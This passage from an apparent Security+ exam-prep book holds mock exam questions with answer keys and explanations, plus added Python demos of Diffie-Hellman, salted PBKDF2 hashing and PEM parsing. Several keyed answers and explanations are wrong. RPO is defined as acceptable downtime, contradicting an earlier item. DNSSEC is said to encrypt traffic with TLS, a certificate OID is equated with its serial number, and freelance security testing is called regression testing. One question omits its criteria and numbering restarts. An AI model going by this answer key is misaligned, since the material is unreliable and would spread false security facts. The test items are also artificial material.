  10. Company A is due to upgrade all of its IT systems and has been investigating moving to the cloud as there is no capital expenditure, since the CSP provides the hardware. Company A would still like to control the IT systems in the cloud. Which cloud model would BEST serve Company A's needs?

A. Software as a Service (SaaS)

B. Infrastructure as a Service (IaaS)

C. Monitoring as a Service (MaaS)

D. Platform as a Service (PaaS)

Answer: B 

Concept: With IaaS the provider supplies the compute, storage, and network (physical or virtualized); the customer installs, configures, and patches the operating system and everything above it, so it keeps the most control of the three service models.

Wrong answers:

A. SaaS is where you lease a bespoke software package that is accessed through a web browser

C. MaaS is where someone monitors your network or applications for you

D. PaaS is a development platform in the cloud

  11. You are a security administrator, and the IT director has tasked you with collecting the volatile memory on Server 1 as it is currently under a cyber attack. Which of the following are the two BEST forms of volatile memory to collect?

A. Secure boot

B. Swap/page file

C. USB flash drive

D. ROM

E. RAM

Answers: B and E 

Concept: Always collect the volatile evidence first, following the order of volatility, because it disappears when the power is removed. RAM is volatile; the swap/page file on disk holds memory pages that were moved out when RAM filled up, so it is the next most volatile source and is collected together with RAM.

Wrong answers:

A. Secure Boot verifies the signatures of boot loaders and drivers at start-up; it is not a store of evidence

C. USB flash drive is nonvolatile

D. ROM is nonvolatile

  12. Bill and Ben the flower pot men are now going to encrypt data using asymmetric encryption, which uses public and private keys. What is the FIRST step they need to take?

A. Exchange public keys

B. Exchange private keys

C. Exchange digital signatures

D. Exchange telephone numbers

Answer: A

Concept: The first stage in asymmetric encryption is key exchange, where each party sends its public key to the other. Data is then encrypted with the recipient's public key and can only be decrypted with the matching private key.

Wrong answers:

B. You should never give your private key away

C. You digitally sign a document or email using your own private key to provide non-repudiation and integrity; signatures are produced and verified, never exchanged as keys

D. Exchanging telephone numbers is just a red herring

  13. At what stage of the SDLC are computer systems no longer supported by the original vendor?

A. Sandboxing

B. End-of-life systems

C. Resource exhaustion

D. System sprawl

Answer: B

Concept: End-of-life systems are no longer operational or supported by the vendor.

Wrong answers:

A. Sandboxing isolates an application, for example for testing or patching, or because it is too dangerous to run on the production network

C. Resource exhaustion is where a system has run out of resources

D. System sprawl is the uncontrolled growth of systems and services, often undocumented and unpatched; it wastes resources and can lead to resource exhaustion

  14. Company A has just developed a bespoke system for booking airline tickets. What is it called if a freelance coding specialist tests it for security flaws?

A. Code review

B. Static code review

C. Regression testing

D. Dynamic code review

Answer: C 

Concept: Regression testing is part of program development, and in larger companies is done by code-testing specialists.

Wrong answers:

A. Code review is carried out on a regular basis to identify dead code

B. Static code review analyzes the source code without running it

D. Dynamic code review tests the code while it is running

  15. You are the security administrator for a company that has just replaced two file servers. Which of the following is the BEST solution for disposing of hard drives that used to store top secret data?

A. Hashing

B. Degaussing

C. Low-level formatting

D. Shredding

Answer: D

Concept: You can shred a whole hard drive down until it looks like powder—let someone try to put that back together again.

Wrong answers:

A. Hashing does not destroy data; it merely shows whether integrity is intact

B. Degaussing destroys the data on magnetic media, but physical destruction of the drive itself is the stronger guarantee (and degaussing does nothing for SSDs)

C. Low-level formatting overwrites the tracks and sectors, but is not as effective as shredding

  16. You are the security administrator for an airline company whose systems suffered a loss of availability last month. Which of the following attacks would MOST likely affect the availability of your IT systems?

A. Spear phishing

B. Replay

C. MITM

D. DoS

Answer: D

Concept: DDoS and DoS attack the availability of IT systems, as they both aim to take them down.

Wrong answers:

A. Spear phishing is an email scam targeted at a specific person or group

B. Replay is an MITM attack that replays messages between two entities at a later date

C. MITM intercepts conversations between two entities, making them believe that they are talking to each other when they are actually talking to the attacker


  17. You are a network administrator setting up a L2TP/IPSec VPN tunnel, as your company needs to move a large amount of encrypted data between the branch office and the head office. Why is Diffie-Hellman used for the IKE phase before the data is forwarded via symmetric encryption?

A. It is a symmetric encryption technique that protects keys

B. It is a hashing technique that protects keys

C. It is an ephemeral technique that protects keys

D. It is an asymmetric technique that protects keys, but sets up a secure channel

Answer: D

Concept: Diffie-Hellman is an asymmetric key-agreement algorithm: each peer has a private value it never sends and a public value it does send. Its role is not to encrypt the data but to let both ends derive the same symmetric key over an untrusted network, so the bulk-encryption key is never transmitted and cannot be captured on the wire.

Wrong answers:

A. Diffie-Hellman uses a public/private pair per peer, while symmetric encryption uses a single shared key

B. Hashing provides integrity, but the data can still be read, so it does not protect confidentiality

C. Ephemeral techniques (DHE, ECDHE) use short-lived, one-session-only keys; that is a property of how DH is used, not why it is used
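
The exchange described in this answer, as an added example that is not the book's code. Both peers generate a private exponent, swap only the public values, and arrive at the same symmetric key, which is then used to authenticate traffic; the private exponents never appear on the wire. The modulus is a toy 127-bit Mersenne prime chosen only so the arithmetic is readable (an assumption for the demo, not a secure parameter); real IKE uses the 2048-bit-or-larger groups from RFC 3526/7919 or an elliptic-curve group.

```python
"""Diffie-Hellman key agreement, as used in IKE phase 1, in plain Python.

Added example, not from the book. P is a toy prime for readability (NOT secure).
"""
import hashlib
import hmac
import secrets

P = 2**127 - 1   # toy modulus: Mersenne prime M127 (assumption for the demo)
G = 5            # generator


def dh_keypair(p: int = P, g: int = G) -> tuple:
    """Return (private, public). The private exponent never leaves the host."""
    priv = secrets.randbelow(p - 2) + 2          # 2 <= priv <= p-1
    pub = pow(g, priv, p)
    return priv, pub


def dh_shared_secret(their_pub: int, my_priv: int, p: int = P) -> int:
    """Each side raises the OTHER side's public value to its own private exponent."""
    if not 1 < their_pub < p - 1:
        # Degenerate public values force the shared secret into a tiny subgroup.
        raise ValueError("peer public value outside the group (reject it)")
    return pow(their_pub, my_priv, p)


def derive_symmetric_key(shared: int, label: bytes = b"ike-demo") -> bytes:
    """Hash the raw DH result into a fixed-size key; never use the raw integer directly."""
    secret_bytes = shared.to_bytes((shared.bit_length() + 7) // 8, "big")
    return hashlib.sha256(label + secret_bytes).digest()


def ike_phase_demo() -> dict:
    """Run the exchange for both peers and report what an eavesdropper would see."""
    hq_priv, hq_pub = dh_keypair()               # head office
    br_priv, br_pub = dh_keypair()               # branch office
    # Only hq_pub and br_pub cross the network.
    k_hq = derive_symmetric_key(dh_shared_secret(br_pub, hq_priv))
    k_br = derive_symmetric_key(dh_shared_secret(hq_pub, br_priv))
    # Symmetric phase: the branch MACs (and would encrypt) a payload, HQ verifies with its copy.
    payload = b"branch->HQ payload"
    tag_from_branch = hmac.new(k_br, payload, hashlib.sha256).digest()
    tag_expected_at_hq = hmac.new(k_hq, payload, hashlib.sha256).digest()
    return {
        "keys_match": hmac.compare_digest(k_hq, k_br),
        "mac_verified": hmac.compare_digest(tag_from_branch, tag_expected_at_hq),
        "on_the_wire": (hq_pub, br_pub),          # what the attacker captured
    }


if __name__ == "__main__":
    print(ike_phase_demo())
```

An attacker who records both public values still cannot compute the shared secret without one of the private exponents, which is the discrete-logarithm problem the security rests on; the range check in `dh_shared_secret` is the minimum validation a real implementation performs on a peer's public value.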

  18. You are a lecturer in a college and you need to deliver a session on salting passwords. What are the two main reasons you would salt passwords?

A. To prevent brute-force attacks

B. To make access to the password slower

C. To prevent duplicate passwords from being stored

D. To stop simple passwords from being used

Answer: A and C

Concept: Salting adds a random value to each password before it is hashed. A precomputed (rainbow) table of hashes is then useless, and an attacker must brute-force every hash separately with its own salt, which is what the exam means by preventing brute-force attacks. Because each salt is different, two users with the same password end up with different stored hashes, so duplicates are no longer visible in the password store.

Wrong answers:

B. Salting makes the hash computation marginally slower, but that is not why it is done; deliberately slowing the computation is the job of key-stretching functions such as PBKDF2 or bcrypt

D. Salting cannot prevent someone from using 12345678 as their password; that would be password complexity
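
The two reasons in the answer can be seen directly in code. The following is an added example, not the book's code: it stores the same weak password for two users once unsalted and once salted with PBKDF2 from the standard library, then shows that a constructed lookup table hits the unsalted hash and misses the salted one, and that identical passwords produce different salted records. The iteration count is an assumption for the demo; tune it to roughly 100 ms on your own hardware.

```python
"""Salted password hashing with PBKDF2-HMAC-SHA256. Added example, not the book's code."""
import hashlib
import hmac
import secrets

ITERATIONS = 100_000          # assumption for the demo; raise until one hash costs ~100 ms
SALT_BYTES = 16


def unsalted_hash(password: str) -> str:
    """The weak scheme: one password always yields the same hash, so table lookups work."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_record(password: str) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex' for storage alongside the user."""
    salt = secrets.token_bytes(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    algo, iters, salt_hex, hash_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)


def table_lookup_succeeds(stored_value: str, table: dict) -> bool:
    """A precomputed hash->password table only helps when there is no salt."""
    return stored_value in table


def demo() -> dict:
    common = "12345678"                      # a weak password that two users both chose
    # Constructed stand-in for a rainbow table: hash -> plaintext for a few common passwords.
    table = {unsalted_hash(p): p for p in ("password", "12345678", "qwerty")}
    rec_alice, rec_bob = make_record(common), make_record(common)
    return {
        "unsalted_identical": unsalted_hash(common) == unsalted_hash(common),
        "salted_identical": rec_alice == rec_bob,          # False: different salts
        "table_hits_unsalted": table_lookup_succeeds(unsalted_hash(common), table),
        "table_hits_salted": table_lookup_succeeds(rec_alice.split("$")[3], table),
        "alice_login_ok": verify(common, rec_alice),
        "wrong_password_rejected": not verify("12345679", rec_alice),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Storing the salt and iteration count in the record itself is deliberate: the salt is not a secret, and keeping the parameters with the hash lets you raise the cost for new records without breaking verification of old ones.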

  19. Which of the following methods of authentication is known as two-factor authentication?

A. PIN and passphrase

B. Mastercard and PIN

C. Username and password

D. Retina and facial recognition

Answer: B 

Concept: Two-factor authentication uses factors from two different groups: something you have, something you know, something you are, or somewhere you are. A card is something you have and a PIN is something you know.

Wrong answers:

A. Both are something you know

C. Both are something you know

D. Both are something you are

  20. During a forensic investigation, the judge has decreed that any data that is investigated should remain in its original form of integrity. Which of the following is used for the integrity of data? Choose two:

A. MD5

B. AES

C. SHA 1

D. DES

Answer: A and C

Concept: Hashing is used to provide integrity of data; MD5 and SHA-1 are two hashing algorithms. Both are collision-broken, so forensic tools today record a SHA-256 hash as well, but on this exam they are still the two hashing choices in the list.

Wrong answers:

B. AES is used for encryption

D. DES is used for encryption

  21. Company A has suffered a distributed-denial-of-service attack, and the company has decided that their RPO should be set at four hours. The directors are holding a board meeting to discuss the progress that is being made. During this meeting, the IT manager has mentioned the Recovery Time Objective (RTO), and the CEO looks confused. How can you explain the meaning of the RTO to the CEO?

A. Acceptable downtime

B. Return to operational state

C. Measure of reliability

D. Average time to repair

Answer: B 

Concept: The RTO is the target time within which a system must be restored after an outage: the return to the operational state.

Wrong answers:

A. Acceptable downtime, in the sense of how much data (measured in time) the business can afford to lose, is the recovery point objective (RPO)

C. A measure of reliability would be the Mean Time Between Failures (MTBF)

D. Average time to repair is the same as the MTTR

  22. The following is a list of different controls. Which of these are physical security controls?

A. Change management

B. Antivirus software

C. Cable locks

D. Firewall rule

E. Iris scanner

Answers: C and E

Concept: You can touch physical security controls; therefore, cable locks are physical and the iris scanner is a physical device for biometric authentication.

Wrong answers:

A. Change management is an administrative control

B. Antivirus is a technical control

D. Firewall rules are technical controls

  23. The security team has identified an unknown vulnerability and isolated it. What technique is BEST for investigating and testing it?

A. Steganography

B. Fuzzing

C. Sandboxing

D. Containerization

Answer: C 

Concept: Sandboxing is where we put an application in an isolated virtual machine to test patches, or maybe just because the application is too dangerous to run on our network.

Wrong answers:

A. Steganography involves hiding a file, image, audio file, or video file inside another file, image, audio file, or video file

B. Fuzzing is a technique for inserting random data inside an application to test for vulnerabilities

D. Containerization is where data is isolated in a mobile phone to separate business data from personal data, such as pictures of family and friends

  24. What is it called when a user has exploited an IT system so that they have obtained access to all files on the file server?

A. Remote exploit

B. Zero-day exploit

C. Privilege escalation

D. Pivoting

Answer: C

Concept: Privilege escalation is where a normal user has obtained admin rights to access resources they should not normally be allowed to access.

Wrong answers:

A. A remote exploit attacks a vulnerability over the network without first having local access to the machine

B. A zero-day exploit targets a vulnerability that has just been discovered (day zero) and for which the vendor has not yet released a patch

D. Pivoting involves accessing a machine inside a network from which you can launch a second attack

  25. You are the security administrator for your company, and the IT manager has asked you to brief them on XML authentication methods. Which of the following should you tell them uses XML-based authentication? Select all that apply:

A. TOTP

B. Federation services

C. Smart card

D. SSO

E. SOAP

F. SAML

Answer: B and F

Concept: SAML is an XML-based standard for exchanging authentication and authorization assertions, and it is what federation services use to pass a user's identity from one organization to another.

Wrong answers:

A. TOTP is an HMAC-based one-time password derived from the current time (RFC 6238); no XML is involved

C. A smart card uses an X.509 certificate and a PIN for authentication

D. SSO means you sign in once and then gain access to all resources without entering your credentials again

E. SOAP is an XML messaging protocol that SAML assertions can be carried over; it is not itself an authentication method

  26. There are a group of certificates in a folder and you need to identify which certificate uses the Privacy-Enhanced Mail (PEM) format. Which of the following is the BEST choice to make?

A. PFX

B. CER

C. Base64

D. P12

Answer: C

Concept: PEM is the Base64 text encoding of the binary DER data, wrapped in BEGIN and END lines, which is why a PEM file opens as readable text while a DER file does not.

Wrong answers:

A. PFX is a binary PKCS#12 container that holds the certificate together with its private key

B. CER is a certificate file, normally the binary DER encoding of the public certificate

D. P12 is the same PKCS#12 private-key container under its other extension
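
The PEM/Base64 relationship from this question and from the certificates practical above can be checked mechanically. The following is an added example, not the book's code: it strips the PEM armor, Base64-decodes the body, and confirms that the result is a well-formed DER structure by checking the outer SEQUENCE tag and its encoded length against the actual size. The certificate bytes are a constructed minimal DER SEQUENCE, not a real X.509 certificate, so that the script runs offline.

```python
"""Telling PEM from DER and checking that the Base64 body really wraps DER.

Added example, not the book's code. SAMPLE_DER is a constructed toy structure.
"""
import base64
import re

PEM_RE = re.compile(
    rb"-----BEGIN (?P<label>[A-Z0-9 ]+)-----\r?\n(?P<body>[A-Za-z0-9+/=\r\n]+)-----END (?P=label)-----"
)


def der_length(data: bytes) -> int:
    """Total size (tag + length bytes + content) of the first DER TLV in data."""
    if len(data) < 2:
        raise ValueError("too short for DER")
    first = data[1]
    if first < 0x80:                        # short form: one byte holds the length
        return 2 + first
    n = first & 0x7F                        # long form: n bytes of length follow
    if n == 0 or n > 4 or len(data) < 2 + n:
        raise ValueError("bad DER length")
    return 2 + n + int.from_bytes(data[2:2 + n], "big")


def looks_like_der(data: bytes) -> bool:
    """X.509, PKCS#7 and PKCS#12 files all start with an outer SEQUENCE (tag 0x30)."""
    try:
        return data[:1] == b"\x30" and der_length(data) == len(data)
    except ValueError:
        return False


def pem_to_der(data: bytes) -> tuple:
    """Strip the armor, Base64-decode, and insist that the payload is well-formed DER."""
    m = PEM_RE.search(data)
    if not m:
        raise ValueError("no PEM armor found")
    der = base64.b64decode(re.sub(rb"\s+", b"", m["body"]), validate=True)
    if not looks_like_der(der):
        raise ValueError("PEM body is not DER")
    return m["label"].decode(), der


def classify(data: bytes) -> str:
    """Answer the question in the text: is this file PEM, binary DER, or something else?"""
    if data.lstrip().startswith(b"-----BEGIN "):
        label, _ = pem_to_der(data)
        return f"PEM ({label})"
    if looks_like_der(data):
        return "DER (binary)"
    return "unknown"


# Constructed sample: SEQUENCE { INTEGER 5, PrintableString "demo" }, not a real certificate.
SAMPLE_DER = b"\x30\x09\x02\x01\x05\x13\x04demo"
SAMPLE_PEM = (b"-----BEGIN CERTIFICATE-----\n"
              + base64.encodebytes(SAMPLE_DER)
              + b"-----END CERTIFICATE-----\n")

if __name__ == "__main__":
    print(classify(SAMPLE_PEM), classify(SAMPLE_DER), classify(b"not a certificate"))
```

The first byte alone does not separate a public certificate from a PKCS#12 bundle, because both are DER SEQUENCEs; that distinction needs the content (a PKCS#12 file carries a PFX version integer and an encrypted payload), which is why the extension conventions in the answer exist.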

  27. Three different companies want to develop an application where they will share the cost of developing resources and future running costs. Which cloud model BEST describes this?

A. Public cloud

B. SaaS

C. Private cloud

D. PaaS

E. IaaS

F. Community cloud

Answer: F 

Concept: A community cloud is built by organizations with a shared need, often from the same industry, so that they can share resources and costs.

Wrong answers:

A. A public cloud is multitenant: the tenants share the provider's infrastructure, but never each other's resources or data

B. SaaS is where a bespoke application is leased by different people

C. A private cloud is single tenant. They don't share with anyone

D. PaaS refers to a development platform, such as Azure

E. IaaS refers to leasing hardware

  28. What type of key does a key escrow manage?

A. Public

B. Session

C. Shared

D. Private

Answer: D

Concept: The key escrow stores private keys for third parties.

Wrong answers:

A. The public key is published freely in the certificate, so there is nothing to escrow

B. The session key is used for communication between two hosts

C. The shared key is used for symmetric encryption

  29. Which of the following is an email-based attack on all members of the sales team?

A. Phishing

B. Vishing

C. Spear phishing

D. Pharming

Answer: C

Concept: Spear phishing is a targeted attack on a specific person or group, here the sales team.

Exam tip:
Spear phishing is aimed at a chosen target (a named individual or a specific group such as one department); plain phishing is sent indiscriminately to anyone who might bite.

Wrong answers:

A. Phishing is an untargeted email attack sent to as many people as possible

B. A vishing attack is launched by using a telephone or leaving a voicemail

D. A pharming attack involves redirecting

  30. An attacker tries to target a high-level executive, but has to leave a voicemail as they did not answer the telephone. What was the intended attack, and what attack was eventually used? Select all that apply:

A. Whaling

B. Vishing

C. Phishing

D. Spear phishing

Answer: B

Concept: Vishing involves targeting a victim using a telephone or leaving a telephone message.

Wrong answers:

A. This is not whaling, as the medium of attack was a telephone—don't be tricked

C and D. Phishing and spear phishing are email attacks

  31. The auditor has been investigating money being stolen from a charity, and they have discovered that the finance assistant has been embezzling money, as they were the only person who dealt with finance, by receiving donations and paying all of the bills. Which of the following is the best option that the auditor should recommend to reduce the risk of this happening again?

A. Hashing

B. Job rotation

C. Separation of duties

D. Mandatory vacations

E. Encryption

Answer: C

Concept: Separation of duties prevents one person from carrying out and authorizing a whole transaction, which is what made the fraud possible here.

Wrong answers:

A. Hashing ensures that data has not been tampered with, thus providing integrity

B. Job rotation prevents fraud; however, a charity may only have one person working in finance

D. Mandatory vacations prevent fraud, but require someone else who can deal with finance work

E. Encrypting data protects data, but has nothing to do with financial transactions

  32. You are a security administrator and you have now moved departments. You are now working with the certificate authority and training Mary, who is a new intern. Mary has asked you what the certificate Object Identifier (OID) consists of. What should you tell her?

A. Certificate signing request

B. Certificate pinning

C. Certificate stapling

D. Certificate serial number

Answer: D

Concept: The OID identifies the X509 itself. It is similar to a serial number; each X509 has a different OID.

Wrong answers:

A. A CSR is a request for a new certificate

B. Pinning prevents the compromise of the CA and the issuing of certificates

C. Stapling is where a web server goes directly to the OCSP for faster authentication, bypassing the CRL

  1. You are the operational manager for a multinational corporation and you are writing a policy in which you mention the RPO. Which of the following is the CLOSEST definition to the RPO?

A. Acceptable downtime

B. Return to operational state

C. A measure of the system reliability

D. Average time to repair

Answer: A

Concept: The RPO is the amount of downtime your system can have without having access to its data.

Wrong answers:

B. The return to operational state is the RTO

C. The mean time between failures is a measure of the system reliability

D. The mean time to repair is the average time to repair

  1. You are carrying out annual training at your company and need to put a PowerPoint slide together on the symptoms of a backdoor virus. Which three points will you include in the slide? Each provides part of the explanation of a backdoor virus:

A. Programs will not open at all, even though you click many times

B. You must click on several items

C. Can be included in an email attachment

D. Files open quicker than before

E. You can only get infected through a link on a webpage

Answers: A, B, and C

Concept: Backdoor viruses can come in through email. They cannot install themselves; this is done by the users unwittingly installing a program. Once installed, the virus may prevent your programs from running.

  1. You are a security administrator and need to set up a new wireless access point so that it is not backward compatible with legacy systems, as these may be vulnerable to attack, and it must be the strongest encryption that you can use. Which is the BEST solution that meets your needs?

A. WPA2 PSK

B. WPA TKIP

C. WPA2 TKIP

D. WPA2 CCMP

Answer: D

Concept: WPA2 CCMP uses AES, which is the strongest wireless encryption and is not backward compatible.

Wrong answers:

A. WPA2 PSK is for home users, where the wireless router password is used to connect to the wireless network

B. WPA TKIP is backward compatible

C. WPA2 TKIP is the strongest backward-compatible option, but it is still backward compatible

  1. Which of the following commands can be used to create a buffer-overflow? Choose all that apply:

A. var char

B. strcpy

C. var data

D. strcat

Answers: B and D

Concept: strcpy and strcat are used to copy and concatenate strings into a char array, and both can cause a buffer-overflow, depending on the number of characters allowed.

Wrong answers:

A. var char sets the variable length of characters

C. var data sets the data type to be used in Java

  1. James has raised a ticket with the IT help desk. He has been tampering with the settings on his computer and he can no longer access the internet. The help desk technicians have checked the configuration on his desktop and the settings are the same as everyone else's. Suddenly, three other people have also reported that they cannot connect to the internet. Which network device should be checked first?

A. Switch

B. Router

C. Hub

D. Repeater

Answer: B

Concept: A router gives you access to the internet; on a computer, it is known as the default gateway.

Wrong answers:

A. A switch joins resources on an internal network

C. A hub is an internal device that is slower than a switch, as it broadcasts traffic

D. A repeater is a device that extends cables beyond their length

  1. Which of the following is a secure wireless protocol that uses TLS?

A. NTLM

B. PAP

C. EAP

D. AES

Answer: C

Concept: EAP-TLS is used for wireless encryption.

Wrong answers:

A. NTLM is a legacy Windows protocol

B. PAP stores passwords in clear text

D. AES involves symmetric encryption and is commonly used with L2TP/IPSec

  1. You are the security administrator for a multinational corporation, and the development team have asked for your advice as to how best to prevent SQL-injection, integer-overflow, and buffer-overflow attacks. Which of the following should you advise them to use?

A. Input validation

B. A host-based firewall with advanced security

C. strcpy

D. Hashing

Answer: A

Concept: Input validation controls the format and characters of data input and will prevent SQL-injection, buffer-overflow, and integer-overflow attacks.

Wrong answers:

B. A host-based firewall protects a desktop or laptop from attack

C. strcpy can cause a buffer-overflow if the string of data is larger than the maximum number of characters allowed in the data field

D. Hashing only confirms data integrity; it has no control over the input used

  1. Your company is opening up a new data center in Galway, Ireland. A server farm has been installed there and now a construction company has come in to put a six-foot mantrap in the entrance. What are the two main reasons why this mantrap has been installed?

A. To prevent theft

B. To prevent tailgating

C. To prevent unauthorized personnel gaining access to the data center

D. To allow faster access to the facility

Answer: B and C

Concept: A mantrap provides a safe and controlled environment in the data center as it allows you to control access.

Wrong answers:

A. Although this will be prevented, it is not the main reason; a mantrap's main purpose is to stop or control people

D. A mantrap will slow access to the data center

  1. Which of the following devices can prevent unauthorized access to the network and prevent attacks from unknown sources?

A. Router

B. Load balancer

C. Web security gateway

D. UTM

Answer: D

Concept: A UTM is a firewall that can prevent unauthorized network access. It can also perform URL filtering, content filtering, and malware inspection.

Wrong answers:

A. A router can prevent access to the network based on the port, protocol, or IP address

B. A load balancer controls the volume of web traffic coming into your web server

C. A web security gateway prevents attacks on web servers

  1. Internet of Things (IoT) is a concept that has recently taken off. Can you identify which of the following devices fall under this category? Select all that apply:

A. ATM

B. Banking system

C. Smart TV

D. Refrigerator

E. Router

F. Wearable technology

Answer: A, C, D, and F

Concept: IoT involves small devices such as household appliances, wearable technology, and ATMs.

Wrong answers:

B. A banking system is not a small device; it is an IT system

E. A router is used to route packets and join networks together

  1. Which feature of DNS will help balance a load without needing to install a network load balancer, or, when coupled with a load balancer, makes it more dynamic?

A. DNS CNAME

B. DNSSEC

C. DNS round robin

D. DNS SRV records

Answer: C

Concept: DNS round robin is a form of redundancy used by DNS to ensure that a server is always available, even when one server suffers a hardware failure. If you have three records for a web server, it will go from the first to the second to the third record and rotate back to the first again.

Wrong answers:

A. A CNAME is an alias; a shortened name for a host with an extremely long hostname

B. DNSSEC creates RRSIG records as it encrypts DNS traffic with TLS

D. SRV records help you find services such as domain controllers or global catalog servers

  1. What is the benefit of certificate pinning?

A. It prevents a certificate signing request from a non-administrator

B. It is used by a web server, and it bypasses the CRL for faster authentication

C. It stops people from spoofing, issuing certificates, or compromising your CA

D. It is used for cross certification between two separate root CAs

Answer: C

Concept: Certificate pinning prevents people from compromising your CA and issuing fraudulent certificates.

Wrong answers:

A. A non-administrator can submit a CSR to obtain a new certificate

B. This is known as certificate stapling

D. This is known as a bridge trust model or a trust model

  1. An auditor has just finished a risk assessment of the company, and he has recommended that we need to mitigate some of our risks. Which of the following are examples of risk mitigation?

A. Turning off host-based firewalls on laptops

B. Installing antivirus software on a new laptop

C. Insuring your car against fire and theft

D. Outsourcing your IT to another company

E. Deciding not to jump into the Grand Canyon

Answer: B

Concept: Risk mitigation involves reducing the risk of an attack or event. These are basically technical controls.

Wrong answers:

A. This increases the risk, as it leaves your laptop vulnerable to attack

C. This is risk transference

D. This also is risk transference

E. This is risk avoidance, as it is deemed too risky

  1. A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following will you choose?

A. L2TP/IPSec

B. SSL VPN

C. PPTP VPN

D. IKEv2 VPN

Answer: B

Concept: SSL VPN is a legacy VPN type that uses SSL certificates. SSL has been replaced by TLS, as TLS is more secure.

  1. You are the Active Directory administrator and you have been training new interns on the Kerberos ticket granting session. One of the interns has asked about the relationship between a service ticket and session ticket used by Kerberos authentication. Which of the following is the best description?

A. The user exchanges their service ticket with the server's session ticket for mutual authentication and single sign on

B. The service key is unencrypted and is matched with the value in the session ticket

C. The user shows the server their session ticket and the server sends him a service ticket

D. The user shows the server their service ticket and the server sends him a session ticket to keep

Answer: A

Concept: Kerberos uses tickets for authentication, mutual authentication, and Single Sign On (SSO). Service and session tickets are exchanged for mutual authentication. The service ticket is encrypted.

  1. Your company has a guest wireless network that can be used by visitors during the day, the sales staff in the evening, and the customer service staff at lunchtime.

They set up a captive portal that fulfills the following criteria:

How will you set up your captive portal? Select three answers; each answer provides part of the solution:

A. WEP 40-bit key

B. WPA2 TKIP

C. WPA-TKIP

D. Open-system authentication

E. WPA2 CCMP

F. WPS

Answer: D, E, and F

Concept: We use open-system authentication for the guest network as it requires no authentication. WPS is used for sales staff as they just need to push a button. Customer-services staff use WPA2 CCMP as it uses AES and is the highest level of WPA.

Wrong answers:

A. WEP should not be used, as it is too weak

B. WPA2 TKIP is used for backward compatibility, and is not as strong as WPA2 CCMP

C. A weaker version of B

  1. You are a security administrator, and the IT team has been using RSA for the encryption of all of their data, but has found that it is very slow. Which of the following should the security administrator recommend to improve the speed of encryption?

A. Asymmetric encryption using DES

B. Asymmetric encryption using Diffie Hellman

C. Symmetric encryption

D. Running a vulnerability scan to find a better solution

Answer: C

Concept: Symmetric encryption is used to encrypt large amounts of data.

Wrong answers:

A. Totally wrong, as DES is symmetric, not asymmetric

B. Diffie Hellman does not encrypt; it only creates a secure channel

D. Vulnerability scans are for missing patches, not encryption

  1. Robert, who is an intern, has been assigned to the security team. A user has called him to ask who signs the X509 certificates. Which one of the following should Robert give as an answer?

A. CRL

B. Key escrow

C. CSR

D. CA

Answer: D

Concept: The CA signs the X509 certificates.

Wrong answers:

A. The CRL checks the certificate validity

B. The key escrow stores private keys for third parties

C. The CSR is the process of requesting a new certificate

Mock Exam 2

  1. You are the security administrator for a large multinational corporation, and you have used a black box penetration tester to find vulnerabilities in your company and exploit them as far as they can. During the penetration test, it was found that there were some vulnerabilities in your Windows 10 desktop operating system. There were no vulnerabilities in any of your Linux or Unix systems. Which of the following BEST describes why the penetration tester was successful with the Windows 10 machines, but not with the Linux or Unix machines?

A. Linux and Unix are more secure than Windows 10

B. The penetration tester did not attempt to exploit the Linux/Unix machines

C. The Linux and Unix operating systems never have any vulnerabilities

D. The operating systems' attack vectors are very different

Answer: D

Concept: Different operating systems have different structures, so the attack vectors and the paths taken to attack them are different.

Wrong answers:

A. Not a proven fact—red herring

B. The penetration tests did attempt the exploit—that is why they had negative results

C. All operating systems suffer from vulnerabilities at one time or another

  1. You are a security administrator and you wish to implement an encrypted method of authentication for your wireless network. Which of the following protocols is the MOST secure for your wireless network?

A. PAP

B. WPA2-PSK

C. EAP-TLS

D. PEAP

Answer: C

Concept: EAP-TLS is a secure wireless authentication protocol, as it uses certificates. It is the most secure EAP standard.

Wrong answers:

A. PAP shows the passwords in clear text and is used by VPN, not wireless networks

B. WPA2-PSK uses a wireless router password; therefore, it is not secure

D. PEAP encrypts EAP packets for secure wireless authentication, but it is not as secure as EAP-TLS

  1. You are designing the network topology for a new company that is rapidly expanding from a one-premise company with 20 users to a medium-sized company with 300 users. The company tells you that it was subject to a DDoS attack last year that took the company down for over a day. In your network design, they don't want to implement a DMZ; therefore, the traffic will be coming directly from the internet. How do you propose to BEST mitigate against future DDoS attacks? Select two answers from the following list; each forms part of the solution:

A. Install a stateless firewall on the edge of your network to prevent incoming traffic

B. Install a stateful firewall on the edge of your network to prevent incoming traffic

C. Install an NIDS in your network as an additional layer of protection

D. Install an NIPS in your network as an additional layer of protection

E. Install an inline NIPS in your network as an additional layer of protection

Answer: B and E

Concept: A stateful firewall on the edge of your network can prevent a DDoS attack as it inspects the traffic, including the verbs. An inline NIPS will ensure that all network traffic coming from the firewall will go through it and be inspected thoroughly.

Wrong answers:

A. A stateless firewall is a basic firewall that will prevent unauthorized access, but does not really inspect the traffic thoroughly

C. An NIDS cannot be an additional layer of protection, as it just detects changes in traffic patterns and cannot prevent the attacks

D. Although installing an NIPS behind the firewall is a good idea, the inline NIPS is a much better solution, as all of the traffic passes through it

  1. You work on the cyber security team of a large multinational corporation, and you have been alerted to an attack on the web server inside your DMZ that is used for selling your products on the internet. You can see by running netstat that you have an unknown active connection. What should be the first step you take when investigating this incident?

A. Isolate the web server by disconnecting it from the network to prevent further damage

B. Disconnect all external active connections to ensure that the attack is stopped

C. Run a packet sniffer to capture the network traffic and identify the attacker

D. Take a screenshot of the damage done to the website and report it to the police

Answer: C

Concept: The first stage when investigating any attack is to capture the volatile evidence. In this incident, you would capture the network traffic to identify the source of the attack.

Wrong answers:

A. Disconnecting the server will prevent further damage, but will not identify the attacker or prevent it from happening again

B. Again, this option will not identify the attacker, but may instead stop legitimate customers

D. A screenshot may not show the real damage being done, and will not identify the attacker

  1. I need to purchase a certificate that I can install on five mail servers. Which one should I purchase?

